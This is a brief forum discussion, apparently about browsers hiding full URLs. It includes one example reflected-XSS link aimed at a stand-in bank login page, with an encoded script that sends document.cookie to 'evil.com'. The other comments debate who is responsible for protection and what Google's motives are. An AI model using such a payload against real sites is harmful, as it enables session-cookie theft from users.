Earlier quoted context omitted.
How about mybank.com/login?reflect=%3Cscript%3Enew%20Image().src=%22 http://evil.com%22%20+%20document.cookie%3C/script%3E
That URL is utterly indecipherable by 99.99% of Internet users, so displaying it in full does absolutely nothing to protect users. The onus to protect against a website takeover is on the domain/server owner, certainly not on the browser vendor although they try to mitigate simple attack vectors. edit: added a few 9s
They already used colors to de-emphasize other components, this doesn't look like anything else than pushing people to rely more on google search.